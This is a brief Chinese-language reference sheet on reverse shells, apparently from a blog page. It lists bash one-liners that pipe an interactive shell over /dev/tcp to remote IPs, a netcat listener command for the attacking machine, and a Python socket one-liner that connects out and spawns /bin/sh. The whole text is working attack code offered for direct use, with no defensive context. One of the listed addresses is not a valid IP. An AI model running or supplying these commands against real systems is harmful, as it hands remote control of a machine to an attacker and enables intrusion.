反弹shell

Reverse Shell

  1. bash反弹
    服务端:

     bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1'
    

    或者

     bash -i >& /dev/tcp/192.168.242.1/7777 0>&1
    

    攻击端:

      nc -lvvp 7777
    
  2. python
    服务端:

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.27.32.227",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

你可能感兴趣的:(反弹shell)